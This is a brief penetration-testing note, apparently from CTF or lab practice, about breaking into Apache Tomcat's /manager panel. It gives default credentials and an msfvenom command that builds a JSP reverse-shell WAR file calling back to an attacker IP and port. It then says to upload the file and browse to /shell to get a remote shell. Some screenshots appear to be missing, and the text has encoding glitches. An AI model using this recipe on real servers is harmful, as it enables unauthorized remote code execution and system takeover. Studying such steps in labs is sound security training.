/manager directory
If you discovered the presence of this directory, you can connect to it with identification
Sometimes it might have default creds:
tomcat:s3cret
Once here, you must upload a .war jsp reverse shell.
To create this shell, you can use msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp lhost=10.11.74.136 lport=666 -f war -o shell.warThen you will upload it:
Now, as it deploys it automatically, you must click on /shell and youโve got a reverse shell:
